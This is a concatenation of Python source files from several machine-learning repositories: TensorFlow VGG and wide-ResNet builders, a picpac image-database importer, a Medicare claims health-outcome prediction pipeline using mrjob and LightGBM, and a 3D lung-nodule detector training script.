ValueError("Unsupported FRRN model '%s'. 
This function only supports FRRN-A and FRRN-B" % (preset_model)) ``` #### File: aardvark/zoo/vgg.py ```python from tensorflow import nn from tensorflow import variable_scope from tensorflow.contrib.framework.python.ops import arg_scope from tensorflow.contrib.layers import conv2d, max_pool2d, flatten, fully_connected, batch_norm # https://arxiv.org/pdf/1409.1556.pdf # Notes: # - default size 224x224 # - input should be normalized by substracting mean pixel value # - conv stride is always 1, down-sizing achieved by max_pool # - conv padding is SAME # - all intermediate conv2d have relu # Tensorflow defaults # - conv2: SAME, relu # - max_pool, VALID def classification_head (net, num_classes): net = flatten(net) net = fully_connected(net, 4096) net = fully_connected(net, 4096) net = fully_connected(net, num_classes, activation_fn=None) return net F1x1 = 1 Flrn = 2 configs = {'a': [[64, 1], [128, 1], [256, 2], [512, 2], [512, 2]], 'a_lrn': [[64, 1, Flrn], [128, 1], [256, 2], [512, 2], [512, 2]], 'b': [[64, 2], [128, 2], [256, 2], [512, 2], [512, 2]], 'c': [[64, 2], [128, 2], [256, 2, F1x1], [512, 2, F1x1], [512, 2, F1x1]], 'd': [[64, 2], [128, 2], [256, 3], [512, 3], [512, 3]], 'e': [[64, 2], [128, 2], [256, 4], [512, 4], [512, 4]], } def backbone (net, config, conv2d_params): for block in config: if len(block) == 2: depth, times = block flag = 0 else: depth, times, flag = block for _ in range(times): net = conv2d(net, depth, 3, **conv2d_params) pass if flag == F1x1: net = conv2d(net, depth, 1, **conv2d_params) pass elif flag == Flrn: raise Exception('LRN not implemented') net = max_pool2d(net, 2, 2) return net def vgg (net, num_classes=None, flavor='a', scope=None, conv2d_params = {}): if scope is None: scope = 'vgg_' + flavor with variable_scope(scope): net = backbone(net, configs[flavor], conv2d_params) if not num_classes is None: net = classification_head(net, num_classes) pass return net def vgg_bn (net, is_training, num_classes=None, flavor='a', scope=None): return vgg(net, num_classes, flavor, scope, {"normalizer_fn": batch_norm, "normalizer_params": {"is_training": is_training, "decay": 0.9, "epsilon": 5e-4}}) ``` #### File: aardvark/zoo/wrn.py ```python from tensorflow import variable_scope from tensorflow.contrib.framework.python.ops import arg_scope from tensorflow.contrib.layers import conv2d, max_pool2d, avg_pool2d, flatten, fully_connected, batch_norm # https://arxiv.org/pdf/1605.07146.pdf # https://arxiv.org/abs/1603.05027 def original_conv2d (net, depth, filter_size, step = 1): return conv2d(net, depth, filter_size, step, normalizer_fn=batch_norm) def rewired_conv2d (net, depth, filter_size): # https://arxiv.org/abs/1603.05027 # original: conv-BN-ReLU, # changed here to: BN-ReLU-conv net = batch_norm(net) net = tf.nn.relu(net) net = tf.conv2d(net, depth, filter_size, normalizer_fn=None, activation_fn=None) return net myconv2d = rewired_conv2d def block (net, config, n, depth, pool): branch = net if pool: net = max_pool2d(net, 2, 2) for _ in range(n): for fs in config: if pool: step = 2 pool = False else: step = 1 branch = myconv2d(branch, depth, fs, step, normalizer_fn=batch_norm) return net + branch def wrn (net, k, n, num_classes=None): net = block(net, [3], n, 16, False) # 32 net = block(net, [3,3], n, 16*k, False) # 32 net = block(net, [3,3], n, 32*k, True) # 16 net = block(net, [3,3], n, 64*k, True) # 8 if not num_classes is None: net = avg_pool2d(net, 8, 8) net = conv2d(net, num_classes, 1, activation_fn=None) pass return net ```
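A minimal sketch of wiring the `vgg_bn` builder above into a classifier. The `zoo.vgg` import path, the 224×224 input size, and the optimizer settings are assumptions; the `UPDATE_OPS` dependency is only needed because the batch-norm layers used by `vgg_bn` register their moving-average updates in that collection.

```python
import tensorflow as tf
from zoo.vgg import vgg_bn   # assumes aardvark/ is on PYTHONPATH

images = tf.placeholder(tf.float32, shape=(None, 224, 224, 3), name='images')
labels = tf.placeholder(tf.int32, shape=(None,), name='labels')
is_training = tf.placeholder(tf.bool, name='is_training')

# flavor 'd' is the 16-layer configuration from the table in vgg.py
logits = vgg_bn(images, is_training, num_classes=1000, flavor='d')
xe = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(
        logits=logits, labels=labels))

# batch_norm adds its moving-average updates to UPDATE_OPS; run them with each step
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
    train_op = tf.train.MomentumOptimizer(0.01, 0.9).minimize(xe)
```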
{ "source": "aaalgo/cls", "score": 3 }
#### File: cls/flowers/import.py ```python
import picpac


def import_db (Set):
    db = picpac.Writer('%s.db' % Set, picpac.OVERWRITE)
    with open('%s.list' % Set, 'r') as f:
        for l in f:
            path, label = l.strip().split('\t')
            with open(path, 'rb') as f2:
                buf = f2.read()
            db.append(float(label), buf)
            pass
        pass
    del db
    pass

import_db('train')
import_db('val')
```
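A sketch of reading one of the databases written above back for training. It mirrors the config-dict `picpac.ImageStream` usage in `predict-rpn.py` earlier in this collection; the batch size, looping flags, and the exact tuple yielded per batch depend on the picpac build, so treat them as assumptions.

```python
import picpac

config = {"db": "train.db",
          "loop": True,          # keep cycling for training
          "shuffle": True,
          "reshuffle": True,
          "annotate": False,     # the flowers db stores only a scalar label
          "channels": 3,
          "dtype": "float32",
          "batch": 32,
          "transforms": []}
stream = picpac.ImageStream(config)

for meta, images in stream:      # assumed unpacking, as in predict-rpn.py
    print(images.shape)
    break
```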
{ "source": "aaalgo/health_outcome_challenge", "score": 2 }
#### File: aaalgo/health_outcome_challenge/compact_helper.py ```python import sys import os import traceback import pickle import mrjob from mrjob.job import MRJob import cms import olap import config class MergeJob (MRJob): INPUT_PROTOCOL = mrjob.protocol.BytesProtocol INTERNAL_PROTOCOL = mrjob.protocol.BytesProtocol OUTPUT_PROTOCOL = mrjob.protocol.BytesProtocol FILES = config.HADOOP_FILES JOBCONF = {'mapred.reduce.tasks': 0, 'mapred.child.renice': 10} def mapper_init (self): self.loader = cms.CaseLoader() pass def mapper (self, key, value): case = self.loader.load(value.decode('ascii')) yield key, olap.encode(olap.Case(case)) pass if __name__ == '__main__': MergeJob.run() pass ``` #### File: aaalgo/health_outcome_challenge/config.py ```python S3_SERVER = 'barton:9000' REDUCE_TASKS = 500 S3_ACCESS_KEY = 'minioadmin' S3_SECRET_KEY = 'minioadmin' S3_BUCKET = 'local' USE_FAKE_DATA = False CASE_SERVER_PORT = 9100 WEB_SERVER = 'http://barton:16666' #CELERY_BROKER = 'redis://localhost:6379/1' #CELERY_BACKEND = 'redis://localhost:6379/2' HADOOP_FILES = ['setup_mrjob.py'] #'cms.py', 'meta2.pkl', 'config.py', 'mapping2.pkl', 'olap.py', 'cms_spark.py', 'target.py'] SERVED_DATA = ['/data2/CMS/cms_stage2/*'] try: from local_config import * HADOOP_FILES.append('local_config.py') except: pass def s3_key (v): v = str(int(v)) l1 = v[-3:] l2 = v[-6:-3] return '%s/%s/%s' % (l1, l2, v) if __name__ == '__main__': print(s3_key(498266385)) pass ``` #### File: aaalgo/health_outcome_challenge/generate_meta1.py ```python import os import sys import pickle import cms from glob import glob def scan_files (): tasks = [] for year in [2008, 2009, 2010]: tasks.append(('den_saf_lds_5_%d' % year, (year, 'den', None))) for ctype in cms.CLAIM_TYPES: if ctype == 'car' and year == 2010: tasks.append(('%s_clm_saf_lds_5_%da' % (ctype, year), (year, ctype, None))) tasks.append(('%s_clm_saf_lds_5_%db' % (ctype, year), (year, ctype, None))) else: tasks.append(('%s_clm_saf_lds_5_%d' % (ctype, year), (year, ctype, None))) pass pass for year in [2011, 2012, 2013, 2014, 2015]: tasks.append(('den_saf_lds_5_%d' % year, (year, 'den', None))) for ctype in ['car', 'dme']: for sub in ['claimsj', 'linej']: tasks.append(('%s_%s_lds_5_%d' % (ctype, sub, year), (year, ctype, sub))) pass for ctype in ['inp', 'out', 'hha', 'snf', 'hosp']: for sub in ['claimsj', 'instcond', 'instoccr', 'instval', 'revenuej']: tasks.append(('%s_%s_lds_5_%d' % (ctype, sub, year), (year, ctype, sub))) pass pass for year in [2016, 2017]: tasks.append(('den_saf_lds_5_%d' % year, (year, 'den', None))) for ctype in ['car', 'dme']: for sub in ['claimsk', 'linek', 'demo']: tasks.append(('%s_%s_lds_5_%d' % (ctype, sub, year), (year, ctype, sub))) pass for ctype in ['inp', 'out', 'hha', 'snf', 'hosp']: for sub in ['claimsk', 'instcond', 'instoccr', 'instval', 'revenuek', 'demo']: tasks.append(('%s_%s_lds_5_%d' % (ctype, sub, year), (year, ctype, sub))) pass pass # 只能递增,上面已有的不能删掉 #cnt = len(cms.deep_glob('*.csv')) #assert cnt == len(tasks) return tasks if __name__ == '__main__': tasks = scan_files() lookup = {} formats = [] fts_files = {} csv_files = {} for path in glob('data/*.fts'): fts_files[os.path.basename(path)] = 1 pass for path in glob('data/*.csv'): csv_files[os.path.basename(path)] = 1 pass for bname, ind in tasks: fid = len(formats) year = ind[0] # sanity check files if year >= 2013: del csv_files[bname + '.csv'] pass if '2010a' in bname: continue elif '2010b' in bname: del fts_files[bname.replace('2010b', '2010') + '.fts'] else: del fts_files[bname + '.fts'] 
pass cols = cms.load_columns_bname(bname) key = None for i, col in enumerate(cols): if col.long_name == 'DESY_SORT_KEY': key = i break pass assert not key is None lookup[bname + '.csv'] = fid formats.append((ind + (key, ), cols)) pass meta_name = 'meta.pkl' assert not os.path.exists(meta_name), "meta.pkl exists" with open(meta_name, 'wb') as f: pickle.dump((cms.META_VERSION, formats, lookup), f) pass print("UNUSED CSV:") for key, _ in csv_files.items(): print(key) print("UNUSED FTS:") for key, _ in fts_files.items(): print(key) pass ``` #### File: health_outcome_challenge/nets_keras/basic4.py ```python import tensorflow as tf from keras.models import Model as BaseModel from keras.layers import Layer, Input, Flatten, Dense, Conv1D, MaxPooling1D, AveragePooling1D, Activation, GlobalAveragePooling1D, GlobalMaxPooling1D, Lambda, Dropout, Multiply, Add, LeakyReLU, LSTM, Embedding, Concatenate class Model (BaseModel): def __init__ (self, codebook): super().__init__() self.embedding = Embedding(codebook, 32) self.concat1 = Concatenate(axis=2) self.conv_claim = Conv1D(32, 1, strides=1, activation='relu') self.lstm = LSTM(32, return_sequences=False, return_state=True) self.dense1 = Dense(32, activation='relu') self.dense2 = Dense(16, activation='relu') self.concat2 = Concatenate(axis=1) self.dense3 = Dense(32, activation='relu') self.dense4 = Dense(2, activation=tf.nn.softmax) pass def call (self, params): demo, claims, codes, transfer = params embed = self.embedding(codes) # batch x n_code x dim # transfer: batch x n_claims x n_code # embed: batch x n_code x dim code_feature = tf.linalg.matmul(transfer, embed) # code_feature: batch x n_claims x dim net = self.concat1([claims, code_feature]) net = self.conv_claim(net) _, state_h, state_c = self.lstm(net) net1 = self.dense1(state_h) net2 = self.dense2(demo) net = self.concat2([net1, net2]) net = self.dense3(net) net = self.dense4(net) return net pass ``` #### File: health_outcome_challenge/nets_keras/basic.py ```python from model_helper import * class Model (tf.keras.Model): def __init__ (self, codebook): super().__init__() self.codebook = codebook pass def call (self, params): demo, claims, codes, transfer = params with track_layers(self): embed = L(Embedding, self.codebook, 32)(codes) # batch x n_code x dim # transfer: batch x n_claims x n_code # embed: batch x n_code x dim code_feature = tf.linalg.matmul(transfer, embed) # code_feature: batch x n_claims x dim net = tf.concat([claims, code_feature], axis=2) net = L(Conv1D, 32, 1, strides=1, activation='relu')(net) _, state_h, state_c = L(LSTM, 32, return_sequences=False, return_state=True)(net) net1 = L(Dense, 32, activation='relu')(state_h) net2 = L(Dense, 16, activation='relu')(demo) net = tf.concat([net1, net2], axis=1) net = L(Dense, 32, activation='relu') (net) net = L(Dense, 2, activation=tf.nn.softmax)(net) return net ``` #### File: aaalgo/health_outcome_challenge/preprocess.py ```python import os import sys import numpy as np import math sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), 'build/lib.linux-x86_64-' + sys.version[:3]))) sys.path.append(os.path.join('/home/wdong/shared/cms2', 'build/lib.linux-x86_64-' + sys.version[:3])) from cms_core import grad_feature def preprocess(data): # print(data.shape) try: imax=data.shape[0] jmax=data.shape[1] except: data=data.reshape((1,data.shape[0])) imax=data.shape[0] jmax=data.shape[1] processed_data=np.zeros((imax,jmax*2)) i=0 while (i<imax): j=0 while (j<jmax): if (math.isnan(data[i][j])): processed_data[i][j*2]=-3000 
else: processed_data[i][j*2]=data[i][j] if (math.isnan(data[i][j])): processed_data[i][j*2+1]=0 else: processed_data[i][j*2+1]=1 j=j+1 i=i+1 return processed_data def faster_preprocess (data): if len(data.shape) == 1: data=data[np.newaxis, :, np.newaxis] else: data=data[:, :, np.newaxis] pass rows = data.shape[0] isnan = np.isnan(data) flags = np.ones_like(data) flags[isnan] = 0 data[isnan] = -3000 data = np.concatenate([data, flags], axis=2).reshape((rows, -1)) return data def feature(whole_train): try: j=whole_train.shape[1] except: whole_train=whole_train.reshape((1,whole_train.shape[0])) i=whole_train.shape[0]-1 while(i<whole_train.shape[0]): length=8*len(whole_train[0,:].flatten()) x_mean=np.nanmean(whole_train[:,:],axis=0) x_std=np.nanstd(whole_train[:,:],axis=0)+0.01 x_norm = np.nan_to_num((whole_train[i,:] - x_mean) / x_std) whole_train_normed=(whole_train[:,:]-x_mean)/x_std matrix=np.ones((length*2+len(x_mean)*4))*(-5000) if (i>=7): matrix[0:length]=whole_train[i-7:i+1,:].flatten() else: matrix[(length-(i+1)*len(whole_train[0].flatten())):length]=whole_train[0:i+1,:].flatten() if (i>=7): matrix[length:length*2]=whole_train_normed[i-7:i+1,:].flatten() else: matrix[(length*2-(i+1)*len(whole_train[0].flatten())):(length*2)]=whole_train_normed[0:i+1,:].flatten() matrix[(length*2):(length*2+len(x_mean))]=x_std matrix[(length*2+len(x_mean)):(length*2+len(x_mean)*2)]=np.sum(whole_train[:,:][whole_train[:,:]==-3000],axis=0)/(-3000.0)/float(whole_train.shape[0]) baseline=[] jjj=0 while (jjj<whole_train.shape[1]): iii=0 val=np.nan while (iii<whole_train.shape[0]): if (whole_train[iii][jjj]==-3000): pass else: if (math.isnan(val)): val=whole_train[iii][jjj] timediff=whole_train.shape[0]-iii iii=iii+1 if (math.isnan(val)): baseline.append(np.nan) baseline.append(np.nan) else: baseline.append(val) baseline.append(timediff) jjj=jjj+1 matrix[(length*2+len(x_mean)*2):(length*2+len(x_mean)*4)]=np.asarray(baseline) i=i+1 return matrix def faster_feature (whole_train): assert len(whole_train.shape) == 2 i=whole_train.shape[0]-1 input_dim = whole_train.shape[1] while(i<whole_train.shape[0]): length=8*input_dim x_mean=np.nanmean(whole_train,axis=0) assert len(x_mean) == input_dim x_std=np.nanstd(whole_train,axis=0)+0.01 x_norm = np.nan_to_num((whole_train[i,:] - x_mean) / x_std) whole_train_normed=(whole_train - x_mean[np.newaxis, :])/x_std[np.newaxis, :] matrix=np.ones((length*2+len(x_mean)*4))*(-5000) if (i>=7): matrix[0:length]=whole_train[i-7:i+1,:].flatten() matrix[length:length*2]=whole_train_normed[i-7:i+1,:].flatten() else: matrix[(length-(i+1)*input_dim):length]=whole_train[0:i+1,:].flatten() matrix[(length*2-(i+1)*len(whole_train[0].flatten())):(length*2)]=whole_train_normed[0:i+1,:].flatten() pass matrix[(length*2):(length*2+len(x_mean))]=x_std matrix[(length*2+len(x_mean)):(length*2+len(x_mean)*2)]=np.sum(whole_train[:,:]==-3000,axis=0)/float(whole_train.shape[0]) matrix[(length*2+len(x_mean)*2):(length*2+len(x_mean)*4)]= grad_feature(whole_train, -3000) i=i+1 return matrix ``` #### File: aaalgo/health_outcome_challenge/report.py ```python from jinja2 import Template TMPL_HTML = """<html> <body> {% for loss, label, predict, cutoff, demo, claims, codes, d_demo, d_claims, d_codes, case in cases %} <hr/> <table border="1"> <tr><th>pid</th><th>loss</th><th>label</th><th>prediction</th><th>cutoff</th></tr> <tr><td>{{case.pid}}</td><td>{{loss}}</td><td>{{label}}</td><td>{{predict}}</td><td>{{cutoff}}</td></tr> </table> <br/> <table border="1"> <tr> {% for c in demo_columns %} <td>{{c}}</td> {% 
endfor %} </tr> {% for demo in case.demos() %} <tr> {% for c in demo_columns %} <td>{{ demo[c]}}</td> {% endfor %} </tr> {% endfor %} </table> <table border="1"> <tr> {% for c in claim_columns %} <td>{{c}}</td> {% endfor %} </tr> {% for claim in case.claims() %} <tr> {% for c in claim_columns %} <td>{{ claim[c] }}</td> {% endfor %} </tr> {% endfor %} </table> <table border="1"> <tr> {% for c in claim_features %} <td>{{c[:6]}}</td> {% endfor %} </tr> {% for claim in d_claims %} <tr> {% for c in claim %} <td> {% if c > 0.0001 or c < -0.0001 %} {{ '%0.4f' % c }} {% endif %} </td> {% endfor %} </tr> {% endfor %} </table> {% endfor %} </body> </html>""" tmpl = Template(TMPL_HTML) def generate_report (loader, cases, path): with open(path, 'w') as f: f.write(tmpl.render({ 'cases': cases, 'demo_columns': loader.demo_columns(), 'claim_columns': loader.claim_columns(), 'claim_features': loader.feature_columns()[:-100], })) pass if __name__ == '__main__': import cms import pickle loader = cms.CoreLoader(cms.loader) with open('eval.pkl', 'rb') as f: out = pickle.load(f) pass cases = [] for pid, loss, label, predict, cutoff, X, grads, line in out: assert not line is None case = loader.load(line, True) assert pid == case.pid #case.label = int(label) #case.predict = predict demo, claims, codes, mapping = X d_demo, d_claims, d_codes = grads cases.append((loss, label, predict, cutoff, demo[0], claims[0], codes[0], d_demo[0], d_claims[0], d_codes, case)) pass generate_report(loader, cases, 'eval.html') ``` #### File: aaalgo/health_outcome_challenge/stat_helper.py ```python import sys import os import traceback import pickle import mrjob from mrjob.job import MRJob import cms import config import target class MergeJob (MRJob): INPUT_PROTOCOL = mrjob.protocol.TextProtocol FILES = config.HADOOP_FILES JOBCONF = {'mapred.reduce.tasks': 10} def mapper_init (self): self.loader = cms.CaseLoader() pass def mapper (self, key, value): case = self.loader.load(value) # 统计DEN人数 for den in case.den: year = '20%02d' % int(den.RFRNC_YR) yield 'den_%s' % year, 1 yield 'den_%s_sex_%d' % (year, int(den.SEX)), 1 yield 'den_%s_state_%d' % (year, int(den.STATE_CD)), 1 #yield 'den_%s_cnty_%d' % (year, int(den.CNTY_CD)), 1 yield 'den_%s_race_%d' % (year, int(den.RACE)), 1 yield 'den_%s_age_%d' % (year, int(den.AGE)), 1 pass if len(case.den) > 0: den = case.den[-1] yield 'den', 1 yield 'den_sex_%d' % int(den.SEX), 1 yield 'den_state_%d' % int(den.STATE_CD), 1 #yield 'den_cnty_%d' % int(den.CNTY_CD), 1 yield 'den_race_%d' % int(den.RACE), 1 yield 'den_age_%d' % int(den.AGE), 1 for ctype in cms.CLAIM_TYPES: rows = getattr(case, ctype, []) labels = target.label_records(rows, ctype == 'inp', False) for row, labels in zip(rows, labels): #getattr(case, ctype): year = str((int(row.THRU_DT) // 10000)) yield 'claim', 1 yield 'claim_%s' % year, 1 yield 'claim_state_%d' % int(row.STATE_CD), 1 yield 'claim_%s_state_%d' % (year, int(row.STATE_CD)), 1 yield 'pmt', row.PMT_AMT yield 'pmt_%s' % year, row.PMT_AMT yield ctype, 1 yield '%s_%s' % (ctype, year), 1 yield '%s_pmt' % ctype, row.PMT_AMT yield '%s_pmt_%s' % (ctype, year), row.PMT_AMT if labels[0]: yield 'E', 1 yield 'E_%s' % year, 1 yield 'E_%s_%s' % (year, ctype), 1 if labels[1]: yield 'POA', 1 yield 'POA_%s' % year, 1 yield 'POA_%s_%s' % (year, ctype), 1 pass pass def reducer (self, key, values): yield key, sum(values) pass if __name__ == '__main__': MergeJob.run() pass ``` #### File: aaalgo/health_outcome_challenge/train_large_trees.py ```python import os import sys import numpy as np 
import random import pickle from datetime import datetime from glob import glob from tqdm import tqdm import sklearn.metrics as metrics import lightgbm import cms os.nice(20) def load_train_cases (paths, loader, gs_path, n = -1): gs = list(cms.load_gs(gs_path)) if n > 0 and n < len(gs): gs = gs[:n] pass cases = loader.bulk_load_aggr_features(paths, [[pid, cutoff] for _, pid, _, cutoff in gs]) X = [] Y = [] pids = [] for label, pid, _, cutoff in gs: X.append(cases[(pid, cutoff)]) Y.append(label) pids.append((pid, cutoff)) pass print("%d cases loaded." % len(Y)) return np.vstack(X), np.array(Y), pids if __name__ == '__main__': import argparse parser = argparse.ArgumentParser(prog='PROG') parser.add_argument('--task', default='mortality' , help='') parser.add_argument('--root', default='mortality_small' , help='') #parser.add_argument('--n1', default=5000, type=int) #parser.add_argument('--n2', default=1000, type=int) args = parser.parse_args() assert args.task == 'mortality' train_paths = list(glob('%s/train/part-0*' % args.root)) test_paths = list(glob('%s/test/part-0*' % args.root)) loader = cms.CoreLoader(cms.loader) train_x, train_y, _ = load_train_cases(train_paths, loader, '%s/train_gs' % args.root) test_x, test_y, test_pids = load_train_cases(test_paths, loader, '%s/test_gs' % args.root) #eval_callback = EpochCallback(test_gs, test_files) print(train_x.shape, train_y.shape) print(test_x.shape, test_y.shape) params = { 'boosting_type': 'gbdt', #'objective': 'regression', 'num_leaves': 150, 'learning_rate': 0.05, 'verbose': 0, 'n_estimators': 400, 'reg_alpha': 2.0, } model = lightgbm.LGBMRegressor(**params) model.fit(train_x, train_y) with open('lgbm_model.pkl', 'wb') as f: pickle.dump(model, f) pass pred = model.predict(test_x) auc = metrics.roc_auc_score(test_y, pred) print('auc:', auc) order = [(v,i) for i, v in enumerate(pred)] order.sort() ranks = [None for _ in range(len(order))] for i, (_, j) in enumerate(order): ranks[j] = i pass N = len(order) # rank 0: 按预测分数排序 evals = [] for pid, label, pred, rank in zip(test_pids, test_y, pred, ranks): if label == 0: # rank应该低才好 # 差的排前面,所以rank越大分数应该越小 orank = N - rank elif label == 1: orank = rank pass evals.append((pid, label, pred, rank, orank)) pass evals.sort(key=lambda x: x[-1]) with open('eval.html', 'w') as f: f.write('<html><body><table border="1">\n') f.write('<tr><th>pid</th><th>cutoff</th><th>label</th><th>pred</th><th>rank</th><th>order</th></tr>\n') for (pid, cutoff), label, pred, rank, orank in evals[:2000]: f.write(f'<tr><td>{pid}</td><td>{cutoff}</td><td>{label}</td><td>{pred:.3f}</td><td>{rank}</td><td>{orank}</td></tr>\n') f.write('</table></body></html>\n') pass ``` #### File: health_outcome_challenge/version1/merge_test_good_minus_1_year.py ```python import os import sys import pickle from glob import glob from collections import defaultdict CNTS = { "car_claimsj_lds_5_2012.csv": 286822, "car_linej_lds_5_2012.csv": 577809, "den_saf_lds_5_2012.csv": 14586, "dme_claimsj_lds_5_2012.csv": 24206, "dme_linej_lds_5_2012.csv": 43115, "hha_claimsj_lds_5_2012.csv": 2406, "hha_instcond_lds_5_2012.csv": 328, "hha_instoccr_lds_5_2012.csv": 181, "hha_instval_lds_5_2012.csv": 9210, "hha_revenuej_lds_5_2012.csv": 49080, "hosp_claimsj_lds_5_2012.csv": 1199, "hosp_instcond_lds_5_2012.csv": 379, "hosp_instoccr_lds_5_2012.csv": 1162, "hosp_instval_lds_5_2012.csv": 2220, "hosp_revenuej_lds_5_2012.csv": 19787, "inp_claimsj_lds_5_2012.csv": 5050, "inp_instcond_lds_5_2012.csv": 6613, "inp_instoccr_lds_5_2012.csv": 7734, 
"inp_instval_lds_5_2012.csv": 18270, "inp_revenuej_lds_5_2012.csv": 86029, "out_claimsj_lds_5_2012.csv": 52086, "out_instcond_lds_5_2012.csv": 25525, "out_instoccr_lds_5_2012.csv": 62827, "out_instval_lds_5_2012.csv": 119141, "out_revenuej_lds_5_2012.csv": 484649, "snf_claimsj_lds_5_2012.csv": 1839, "snf_instcond_lds_5_2012.csv": 763, "snf_instoccr_lds_5_2012.csv": 2913, "snf_instval_lds_5_2012.csv": 3478, "snf_revenuej_lds_5_2012.csv": 14509 } def construct_2011_name (path): bname = os.path.basename(path) # 2011: hha_instcond_lds_5_2011.csv # inp_instval_lds_2012_sample.csv return bname.replace('2012', '2011') with open('meta.pkl', 'rb') as f: formats, lookup = pickle.load(f) pass ''' def verify_header (path, header, cols): fs = header.strip().split(',') assert len(fs) >= len(cols), '%d %d' % (len(fs), len(cols)) assert fs[0] == 'DESY_SORT_KEY' for h, c in zip(fs, cols): assert h == c.long_name if len(fs) > len(cols): for h in fs[len(cols):]: print("COLUMN NOT MAPPED: ", h, path) pass ''' SPECIAL_DATES = ['CLM_HOSPC_START_DT_ID', 'NCH_BENE_MDCR_BNFTS_EXHTD_DT_I'] def process_file (path): #global lookup #global formats bname = os.path.basename(path) bname2011 = construct_2011_name(path) fid = lookup[bname2011] #print(path, lookup[bname2011]) ind, cols = formats[fid] with open(path, 'r') as f: to_patch = [] for i, col in enumerate(cols): if not col.type is int: continue v = col.long_name.find('_DT') if v < 0: continue suff = col.long_name[(v + 3):] if len(suff) == 0 or suff.isnumeric() or col.long_name in SPECIAL_DATES: to_patch.append((i, col)) pass for row, line in enumerate(f): line = line.strip() fs = line.split(',') assert len(fs) == len(cols) key = fs[0] assert len(key) == 9 for i, col in to_patch: if len(fs[i]) == 0: continue assert fs[i].isnumeric(), 'xxx:%s' % fs[i] x = int(fs[i]) if col.long_name == 'DOB_DT' and x < 100: continue assert x > 18000000 x = x - 10000 if x == 20110229: x = 20110228 fs[i] = str(x) #fs[i] = str(x - 0) pass fs.insert(0, str(fid)) yield key, ','.join(fs) pass pass merged = defaultdict(lambda: []) KEYS_2012 = defaultdict(lambda: []) for path in ['tests/den_saf_lds_5_2012.csv']: for key, value in process_file(path): key1 = key[:6] KEYS_2012[key1].append(key) pass pass print(len(KEYS_2012), 'keys in 2012 loaded.') C = 0 #for path in glob('tests/*2012*.csv'): for path in glob('tests/*.csv'): c = 0 check_cnts = CNTS[os.path.basename(path)] del CNTS[os.path.basename(path)] for key, value in process_file(path): merged[key].append(value) c += 1 pass print(c, 'rows loaded from ', path) assert (c == check_cnts) C += 1 pass assert len(CNTS) == 0 with open('/shared/data/CMS/tests/tests_2012_minus_1year', 'w') as f: for k, v in merged.items(): f.write(k) f.write('\t') f.write('|'.join(v)) f.write('\n') pass pass ```
{ "source": "aaalgo/lung_example", "score": 2 }
#### File: aaalgo/lung_example/train.py ```python import math import sys sys.path.append('../aardvark') sys.path.append('build/lib.linux-x86_64-' + sys.version[:3]) import random import numpy as np import tensorflow as tf import aardvark import rpn3d from zoo import net3d from lung import * import cpp flags = tf.app.flags FLAGS = flags.FLAGS MIN_SPACING = 0.75 MAX_SPACING = 0.85 SZ = 128 class Stream: # this class generates training examples def __init__ (self, path, is_training): self.ones = np.ones((1, SZ, SZ, SZ, 1), dtype=np.float32) samples = [] with open(path, 'r') as f: for l in f: samples.append(l.strip()) pass pass self.samples = samples self.sz = len(samples) self.is_training = is_training self.reset() pass def reset (self): samples = self.samples is_training = self.is_training def generator (): while True: if is_training: random.shuffle(samples) pass for path in samples: volume = H5Volume(path) n = volume.annotation.shape[0] # sample one random annotation # TODO: what if there are multiple nearby annotations? if n == 0: # no nodule continue n = random.randint(0, n-1) spacing = random.uniform(MIN_SPACING, MAX_SPACING) sub, nodule = extract_nodule(volume, volume.annotation[n], spacing, (SZ, SZ, SZ)) # TODO augmentation? a, p = cpp.encode(sub.images.shape, nodule) images = sub.images[np.newaxis, :, :, :, np.newaxis] pw = a[np.newaxis, :, :, :, np.newaxis] a = a[np.newaxis, :, :, :, np.newaxis] p = p[np.newaxis, :, :, :, np.newaxis, :] # we should also generate pure negative samples yield None, images, a, self.ones, p, pw if not self.is_training: break self.generator = generator() pass def size (self): return self.sz def next (self): return next(self.generator) class Model (aardvark.Model, rpn3d.BasicRPN3D): def __init__ (self): aardvark.Model.__init__(self) rpn3d.BasicRPN3D.__init__(self) pass def rpn_backbone (self, volume, is_training, stride): assert(stride == 1) net, s = net3d.unet(volume, is_training) return net def rpn_logits (self, net, is_training, channels): return tf.layers.conv3d_transpose(net, channels, 3, strides=1, activation=None, padding='SAME') def rpn_params (self, net, is_training, channels): return tf.layers.conv3d_transpose(net, channels, 3, strides=1, activation=None, padding='SAME') def build_graph (self): self.is_training = tf.placeholder(tf.bool, name="is_training") self.images = tf.placeholder(tf.float32, shape=(None, SZ, SZ, SZ, FLAGS.channels), name="volume") self.build_rpn(self.images, self.is_training, (SZ, SZ, SZ)) pass def create_stream (self, path, is_training): return Stream(path, is_training) def feed_dict (self, record, is_training = True): _, images, a, aw, p, pw = record return {self.images: images, self.gt_anchors: a, self.gt_anchors_weight: aw, self.gt_params: p, self.gt_params_weight: pw, self.is_training: is_training} pass def main (_): FLAGS.channels = 1 FLAGS.classes = 1 FLAGS.db = 'luna16.list' FLAGS.val_db = None FLAGS.epoch_steps = 100 FLAGS.ckpt_epochs = 1 FLAGS.val_epochs = 1000 FLAGS.model = "model" FLAGS.rpn_stride = 1 FLAGS.rpn_params = 4 model = Model() aardvark.train(model) pass if __name__ == '__main__': try: tf.app.run() except KeyboardInterrupt: pass ```
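The training script above reads `luna16.list`, one preprocessed H5 volume path per line, and `Stream` loads each path with `H5Volume`. A sketch of producing that list file is below; the `scratch/luna16/*.h5` location is an assumption about where the preprocessed volumes are stored.

```python
import os
from glob import glob

# assumed location of the preprocessed H5 volumes
paths = sorted(glob('scratch/luna16/*.h5'))

with open('luna16.list', 'w') as f:
    for path in paths:
        f.write(os.path.abspath(path) + '\n')
print('wrote %d volume paths to luna16.list' % len(paths))
```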
{ "source": "aaalgo/nnexp", "score": 2 }
